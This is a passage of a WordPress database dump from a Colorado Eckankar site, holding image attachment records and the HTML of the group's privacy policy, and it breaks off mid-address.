21:26:11','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_036-lg.jpg',0,'attachment','image/jpeg',0),(165254,2,'2019-09-24 15:26:13','2019-09-24 21:26:13','','ECK_Temple_CO_037-lg','','inherit','closed','closed','','eck_temple_co_037-lg','','','2019-09-24 15:26:13','2019-09-24 21:26:13','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_037-lg.jpg',0,'attachment','image/jpeg',0),(165255,2,'2019-09-24 15:26:16','2019-09-24 21:26:16','','ECK_Temple_CO_038-lg','','inherit','closed','closed','','eck_temple_co_038-lg','','','2019-09-24 15:26:16','2019-09-24 21:26:16','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_038-lg.jpg',0,'attachment','image/jpeg',0),(165256,2,'2019-09-24 15:26:19','2019-09-24 21:26:19','','ECK_Temple_CO_039-lg','','inherit','closed','closed','','eck_temple_co_039-lg','','','2019-09-24 15:26:19','2019-09-24 21:26:19','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_039-lg.jpg',0,'attachment','image/jpeg',0),(165257,2,'2019-09-24 15:26:22','2019-09-24 21:26:22','','ECK_Temple_CO_040-lg','','inherit','closed','closed','','eck_temple_co_040-lg','','','2019-09-24 15:26:22','2019-09-24 21:26:22','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_040-lg.jpg',0,'attachment','image/jpeg',0),(165258,2,'2019-09-24 15:26:25','2019-09-24 21:26:25','','ECK_Temple_CO_041-lg','','inherit','closed','closed','','eck_temple_co_041-lg','','','2019-09-24 15:26:25','2019-09-24 21:26:25','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_041-lg.jpg',0,'attachment','image/jpeg',0),(165259,2,'2019-09-24 15:26:27','2019-09-24 21:26:27','','ECK_Temple_CO_042-lg','','inherit','closed','closed','','eck_temple_co_042-lg','','','2019-09-24 15:26:27','2019-09-24 21:26:27','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_042-lg.jpg',0,'attachment','image/jpeg',0),(165260,2,'2019-09-24 15:26:31','2019-09-24 21:26:31','','ECK_Temple_CO_043-lg','','inherit','closed','closed','','eck_temple_co_043-lg','','','2019-09-24 15:26:31','2019-09-24 21:26:31','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_043-lg.jpg',0,'attachment','image/jpeg',0),(165261,2,'2019-09-24 15:26:34','2019-09-24 21:26:34','','ECK_Temple_CO_044-lg','','inherit','closed','closed','','eck_temple_co_044-lg','','','2019-09-24 15:26:34','2019-09-24 21:26:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_044-lg.jpg',0,'attachment','image/jpeg',0),(165262,2,'2019-09-24 15:26:37','2019-09-24 21:26:37','','ECK_Temple_CO_045-lg','','inherit','closed','closed','','eck_temple_co_045-lg','','','2019-09-24 15:26:37','2019-09-24 21:26:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_045-lg.jpg',0,'attachment','image/jpeg',0),(165263,2,'2019-09-24 15:26:39','2019-09-24 21:26:39','','ECK_Temple_CO_046-lg','','inherit','closed','closed','','eck_temple_co_046-lg','','','2019-09-24 15:26:39','2019-09-24 21:26:39','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_046-lg.jpg',0,'attachment','image/jpeg',0),(165264,2,'2019-09-24 15:26:42','2019-09-24 21:26:42','','ECK_Temple_CO_047-lg','','inherit','closed','closed','','eck_temple_co_047-lg','','','2019-09-24 15:26:42','2019-09-24 21:26:42','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_047-lg.jpg',0,'attachment','image/jpeg',0),(165265,2,'2019-09-24 15:26:45','2019-09-24 21:26:45','','ECK_Temple_CO_048-lg','','inherit','closed','closed','','eck_temple_co_048-lg','','','2019-09-24 15:26:45','2019-09-24 21:26:45','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_048-lg.jpg',0,'attachment','image/jpeg',0),(165266,2,'2019-09-24 15:26:47','2019-09-24 21:26:47','','ECK_Temple_CO_049-lg','','inherit','closed','closed','','eck_temple_co_049-lg','','','2019-09-24 15:26:47','2019-09-24 21:26:47','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_049-lg.jpg',0,'attachment','image/jpeg',0),(165267,2,'2019-09-24 15:26:50','2019-09-24 21:26:50','','ECK_Temple_CO_050-lg','','inherit','closed','closed','','eck_temple_co_050-lg','','','2019-09-24 15:26:50','2019-09-24 21:26:50','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_050-lg.jpg',0,'attachment','image/jpeg',0),(165268,2,'2019-09-24 15:26:53','2019-09-24 21:26:53','','ECK_Temple_CO_051-lg','','inherit','closed','closed','','eck_temple_co_051-lg','','','2019-09-24 15:26:53','2019-09-24 21:26:53','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_051-lg.jpg',0,'attachment','image/jpeg',0),(165269,2,'2019-09-24 15:26:56','2019-09-24 21:26:56','','ECK_Temple_CO_052-lg','','inherit','closed','closed','','eck_temple_co_052-lg','','','2019-09-24 15:26:56','2019-09-24 21:26:56','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_052-lg.jpg',0,'attachment','image/jpeg',0),(165270,2,'2019-09-24 15:26:59','2019-09-24 21:26:59','','ECK_Temple_CO_053-lg','','inherit','closed','closed','','eck_temple_co_053-lg','','','2019-09-24 15:26:59','2019-09-24 21:26:59','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_053-lg.jpg',0,'attachment','image/jpeg',0),(165271,2,'2019-09-24 15:27:02','2019-09-24 21:27:02','','ECK_Temple_CO_054-lg','','inherit','closed','closed','','eck_temple_co_054-lg','','','2019-09-24 15:27:02','2019-09-24 21:27:02','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_054-lg.jpg',0,'attachment','image/jpeg',0),(165272,2,'2019-09-24 15:27:05','2019-09-24 21:27:05','','ECK_Temple_CO_055-lg','','inherit','closed','closed','','eck_temple_co_055-lg','','','2019-09-24 15:27:05','2019-09-24 21:27:05','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_055-lg.jpg',0,'attachment','image/jpeg',0),(165273,2,'2019-09-24 15:27:08','2019-09-24 21:27:08','','ECK_Temple_CO_056-lg','','inherit','closed','closed','','eck_temple_co_056-lg','','','2019-09-24 15:27:08','2019-09-24 21:27:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_056-lg.jpg',0,'attachment','image/jpeg',0),(165274,2,'2019-09-24 15:27:10','2019-09-24 21:27:10','','ECK_Temple_CO_057-lg','','inherit','closed','closed','','eck_temple_co_057-lg','','','2019-09-24 15:27:10','2019-09-24 21:27:10','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_057-lg.jpg',0,'attachment','image/jpeg',0),(165275,2,'2019-09-24 15:27:13','2019-09-24 21:27:13','','ECK_Temple_CO_058-lg','','inherit','closed','closed','','eck_temple_co_058-lg','','','2019-09-24 15:27:13','2019-09-24 21:27:13','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_058-lg.jpg',0,'attachment','image/jpeg',0),(165276,2,'2019-09-24 15:27:16','2019-09-24 21:27:16','','ECK_Temple_CO_059-lg','','inherit','closed','closed','','eck_temple_co_059-lg','','','2019-09-24 15:27:16','2019-09-24 21:27:16','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_059-lg.jpg',0,'attachment','image/jpeg',0),(165277,2,'2019-09-24 15:27:18','2019-09-24 21:27:18','','ECK_Temple_CO_060-lg','','inherit','closed','closed','','eck_temple_co_060-lg','','','2019-09-24 15:27:18','2019-09-24 21:27:18','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_060-lg.jpg',0,'attachment','image/jpeg',0),(165278,2,'2019-09-24 15:27:21','2019-09-24 21:27:21','','ECK_Temple_CO_061-lg','','inherit','closed','closed','','eck_temple_co_061-lg','','','2019-09-24 15:27:21','2019-09-24 21:27:21','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_061-lg.jpg',0,'attachment','image/jpeg',0),(165279,2,'2019-09-24 15:27:24','2019-09-24 21:27:24','','ECK_Temple_CO_062-lg','','inherit','closed','closed','','eck_temple_co_062-lg','','','2019-09-24 15:27:24','2019-09-24 21:27:24','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_062-lg.jpg',0,'attachment','image/jpeg',0),(165280,2,'2019-09-24 15:27:26','2019-09-24 21:27:26','','ECK_Temple_CO_063-lg','','inherit','closed','closed','','eck_temple_co_063-lg','','','2019-09-24 15:27:26','2019-09-24 21:27:26','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_063-lg.jpg',0,'attachment','image/jpeg',0),(165281,2,'2019-09-24 15:27:29','2019-09-24 21:27:29','','ECK_Temple_CO_064-lg','','inherit','closed','closed','','eck_temple_co_064-lg','','','2019-09-24 15:27:29','2019-09-24 21:27:29','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_064-lg.jpg',0,'attachment','image/jpeg',0),(165282,2,'2019-09-24 15:27:32','2019-09-24 21:27:32','','ECK_Temple_CO_065-lg','','inherit','closed','closed','','eck_temple_co_065-lg','','','2019-09-24 15:27:32','2019-09-24 21:27:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_065-lg.jpg',0,'attachment','image/jpeg',0),(165283,2,'2019-09-24 15:27:34','2019-09-24 21:27:34','','ECK_Temple_CO_066-lg','','inherit','closed','closed','','eck_temple_co_066-lg','','','2019-09-24 15:27:34','2019-09-24 21:27:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_066-lg.jpg',0,'attachment','image/jpeg',0),(165284,2,'2019-09-24 15:27:37','2019-09-24 21:27:37','','ECK_Temple_CO_067-lg','','inherit','closed','closed','','eck_temple_co_067-lg','','','2019-09-24 15:27:37','2019-09-24 21:27:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_067-lg.jpg',0,'attachment','image/jpeg',0),(165285,2,'2019-09-24 15:27:40','2019-09-24 21:27:40','','ECK_Temple_CO_068-lg','','inherit','closed','closed','','eck_temple_co_068-lg','','','2019-09-24 15:27:40','2019-09-24 21:27:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_068-lg.jpg',0,'attachment','image/jpeg',0),(165286,2,'2019-09-24 15:27:43','2019-09-24 21:27:43','','ECK_Temple_CO_069-lg','','inherit','closed','closed','','eck_temple_co_069-lg','','','2019-09-24 15:27:43','2019-09-24 21:27:43','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_069-lg.jpg',0,'attachment','image/jpeg',0),(165287,2,'2019-09-24 15:27:45','2019-09-24 21:27:45','','ECK_Temple_CO_070-lg','','inherit','closed','closed','','eck_temple_co_070-lg','','','2019-09-24 15:27:45','2019-09-24 21:27:45','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_070-lg.jpg',0,'attachment','image/jpeg',0),(173870,2,'2019-10-05 17:22:51','2019-10-05 23:22:51','','activities-ELSS','','inherit','closed','closed','','activities-elss','','','2019-10-05 17:22:51','2019-10-05 23:22:51','',45842,'https://eckankar-colorado.org/wp-content/uploads/2019/10/activities-ELSS.jpg',0,'attachment','image/jpeg',0),(173871,2,'2019-10-05 17:23:37','2019-10-05 23:23:37','','activities-Seminars-Workshops','','inherit','closed','closed','','activities-seminars-workshops','','','2019-10-05 17:23:37','2019-10-05 23:23:37','',45842,'https://eckankar-colorado.org/wp-content/uploads/2019/10/activities-Seminars-Workshops.jpg',0,'attachment','image/jpeg',0),(173872,2,'2019-10-05 17:24:04','2019-10-05 23:24:04','','activities-Easy Way','','inherit','closed','closed','','activities-easy-way','','','2019-10-05 17:24:04','2019-10-05 23:24:04','',45842,'https://eckankar-colorado.org/wp-content/uploads/2019/10/activities-Easy-Way.jpg',0,'attachment','image/jpeg',0),(173873,2,'2019-10-05 17:24:33','2019-10-05 23:24:33','','activities-Meetups','','inherit','closed','closed','','activities-meetups','','','2019-10-05 17:24:48','2019-10-05 23:24:48','',45842,'https://eckankar-colorado.org/wp-content/uploads/2019/10/activities-Meetups.jpg',0,'attachment','image/jpeg',0),(173875,2,'2019-10-05 17:25:52','2019-10-05 23:25:52','','activities-Youth and Family','','inherit','closed','closed','','activities-youth-and-family','','','2019-10-05 17:26:05','2019-10-05 23:26:05','',45842,'https://eckankar-colorado.org/wp-content/uploads/2019/10/activities-Youth-and-Family.jpg',0,'attachment','image/jpeg',0),(173876,2,'2019-10-05 17:26:26','2019-10-05 23:26:26','','activities-Video Discussions','','inherit','closed','closed','','activities-video-discussions','','','2019-10-05 17:26:42','2019-10-05 23:26:42','',45842,'https://eckankar-colorado.org/wp-content/uploads/2019/10/activities-Video-Discussions.jpg',0,'attachment','image/jpeg',0),(173877,2,'2019-10-05 17:35:16','2019-10-05 23:35:16','','activities-book discussions-2','','inherit','closed','closed','','activities-book-discussions-2','','','2019-10-05 17:35:16','2019-10-05 23:35:16','',45842,'https://eckankar-colorado.org/wp-content/uploads/2019/10/activities-book-discussions-2.jpg',0,'attachment','image/jpeg',0),(173926,2,'2019-10-05 17:37:49','2019-10-05 23:37:49','','activities-ELSS-2','','inherit','closed','closed','','activities-elss-2','','','2019-10-05 17:38:04','2019-10-05 23:38:04','',45842,'https://eckankar-colorado.org/wp-content/uploads/2019/10/activities-ELSS-2.jpg',0,'attachment','image/jpeg',0),(174942,2,'2019-10-06 21:41:32','2019-10-07 03:41:32','','harold-intro--Bg-4','','inherit','closed','closed','','harold-intro-bg-4','','','2019-10-06 21:41:32','2019-10-07 03:41:32','',7160,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-intro-Bg-4.jpg',0,'attachment','image/jpeg',0),(175618,2,'2019-10-07 20:53:32','2019-10-08 02:53:32','','harold-klemp-smtabs','','inherit','closed','closed','','harold-klemp-smtabs','','','2019-10-07 20:53:32','2019-10-08 02:53:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-klemp-smtabs.jpg',0,'attachment','image/jpeg',0),(181536,2,'2019-10-10 12:12:32','2019-10-10 18:12:32','<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-about-8 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 18px; padding-top: 60px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; text-align: left; font-family: \'Raleway\'; font-weight: 600; text-transform: capitalize; color: #1e63bc; font-size: 30px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Colorado Satsang Society (Eckankar in Colorado)<br>\r\nPrivacy Policy</h2>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 16px; font-weight: 600;\" data-font-weight=\"600\"><strong>Effective December 1, 2022</strong></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">What personal information does Colorado Satsang Society collect?</h4>\r\n<p class=\"bg-font-family-alt\" style=\"border-width: 0px; font-size: 14px;\">Colorado Satsang Society collects personally identifying information, such as your name, mailing address, email address, telephone number, and/or credit-card information, if you choose to provide that information by</p>\r\n<p class=\"bg-font-family-alt\" style=\"border-width: 0px; margin-left: 18px;\">• Signing up to receive email or other mailings from Colorado Satsang Society (no credit-card information requested);<br>\r\n• Preregistering for a seminar or online event;<br>\r\n• Making an online donation;</p>\r\n<p class=\"bg-font-family-alt\" style=\"border-width: 0px;\">We also receive your contact information from Eckankar’s parent church in Chanhassen, Minnesota, if you have requested information about local events from the parent church or if you are a member of Eckankar.</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\"><img class=\"wp-image-267356 size-full aligncenter bg-img bg-img-rounded-top-left bg-img-rounded-top-right\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/10/info-security-1.jpg\" alt=\"\" width=\"685\" height=\"336\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Does Colorado Satsang Society sell or rent my personal information?</h4>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Absolutely not.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h3 class=\"\" style=\"border-width: 0px; font-size: 20px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Will I receive unsolicited email from Colorado Satsang Society?</h3>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">We do not send unsolicited email.<br>\r\nYou may unsubscribe from email from us or Eckankar at any time by clicking on the unsubscribe link provided in the email.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">How is my personal information protected?</h4>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Safeguarding the information you give us is a priority.<br>\r\nWe take appropriate security measures to protect against loss, misuse, unauthorized access, alteration, disclosure, or destruction of your information.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h3 class=\"\" style=\"border-width: 0px; font-size: 20px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">How long is my personal information retained?</h3>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado Satsang Society keeps your information as long as needed for the purposes outlined in this Privacy Policy, to resolve questions, and as necessary to comply with legal obligations.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Does Colorado Satsang Society share my personal information with others?</h4>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado Satsang Society does not share your personal information with others except in the following cases:</p>\r\n<ul class=\"\">\r\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">Such information may be shared with authorized leaders of Eckankar to fulfill your requests, administer contact lists, and coordinate activities. All such recipients sign a data-privacy agreement and may only process your personal data for the purposes given in this Privacy Policy and according to local law.<br>\r\n<br>\r\n</li>\r\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">Personal information may be shared as needed with third-party companies for the sole purpose of providing services that help us fulfill your request (e.g., a credit-card processor or a company specializing in emailing services). They are contractually required to provide strict security to the handling of personal information.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h3 class=\"\" style=\"border-width: 0px; font-size: 20px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">How can I tell when my online transactions are secure?</h3>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Your browser will show you when you are making a secure transaction in two main ways. When you access a form, a secure connection is indicated when “https” appears in the address bar of your browser. Somewhere in your browser window, you may also see a locked-padlock icon. These indicators tell you that all information entered on that page will be encrypted when you submit the form (e.g., by clicking “Submit,” “Send,” or “Place Order”).</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h4 class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; text-transform: none; color: #1e63bc; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">How is my credit-card information protected?</h4>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado Satsang Society keeps your data secure with end-to-end encryption and tokenization. <br>\r\nWe receive no credit-card data for transactions made on our website. All donations are done through PayPal. For more information, see PayPal’s <a href=\"https://www.paypal.com/en/webapps/mpp/ua/privacy-full\">Privacy Policy</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h3 class=\"\" style=\"border-width: 0px; font-size: 20px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Is there any automated data processing on the Colorado Satsang Society website?</h3>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Cookies<br>\r\nA cookie is a small text file that is stored on your computer when you visit a website.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado Satsang Society cookies identify your browser, which sends the cookie to our web server.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Cookies help us understand how you are using our website. This is purely statistical information and does not track your personal information or your web usage once you leave the Colorado Satsang Society site. This information helps us provide a better experience for all users of our website.<br>\r\n<br>\r\nA cookie is not harmful to your computer in any way. It cannot be used to spread viruses, nor can it read your hard drive to obtain personal information about you. It is a text file that you can delete at any time. When you revisit our website, we do not access the cookie from the previous session.<br>\r\n<br>\r\nYou can navigate the site even if you disable cookies in your browser (most browsers allow cookies by default).</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h3 class=\"\" style=\"border-width: 0px; font-size: 20px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Access logs</h3>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Like all web servers, our web server automatically creates access logs for every visit to our site. Access logs include the time of your visit, the type of browser you are using, the IP address for the computer you are visiting from, and the Web page you came from. {We analyze these logs to help us improve the user experience. We also use Google Analytics for the same purpose.}<br>\r\n<br>\r\nThe IP address is not associated with any personally identifying information unless (1) you have filled out any forms on the website and (2) it is necessary to research possible harmful or illegal conduct in connection with the use of our websites, or to comply with the law.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h3 class=\"\" style=\"border-width: 0px; font-size: 20px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Does Colorado Satsang Society collect information from children?</h3>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">No, we do not knowingly collect information from visitors age 17 and under. If you believe your child has provided Colorado Satsang Society with their personal information without your permission, please contact us so the information can be removed.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h3 class=\"\" style=\"border-width: 0px; font-size: 20px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">What are the bases for collecting and using my personal information?</h3>\r\n<ul class=\"\">\r\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">Your consent so that we can inform you about Eckankar news and events</li>\r\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">As necessary to fulfill your requests and transactions</li>\r\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">As a nonprofit religious organization and church, to administer membership records and matters</li>\r\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">If required by law or pursuant to legal process or other legal obligation</li>\r\n	<li style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\">When it is necessary to protect the vital interests of you or another person</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h3 class=\"\" style=\"border-width: 0px; font-size: 20px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">What are my rights regarding personal information I give to the Colorado Satsang Society?</h3>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado Satsang Society provides you with reasonable access to the personal information you gave us as well as the ability to review, correct, and delete such personal information to the extent required by law.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<h3 class=\"\" style=\"border-width: 0px; font-size: 20px; margin-top: 10px; text-transform: none; font-family: \'Open Sans\'; font-weight: 600; color: #1e63bc;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Who do I contact with privacy questions or requests?</h3>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; padding-left: 40px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado Satsang Society<br>\r\nEckankar In Colorado <br>\r\nAtt: Privacy Inquiries<br>\r\nP.O. Box 22541, Denver, Colorado 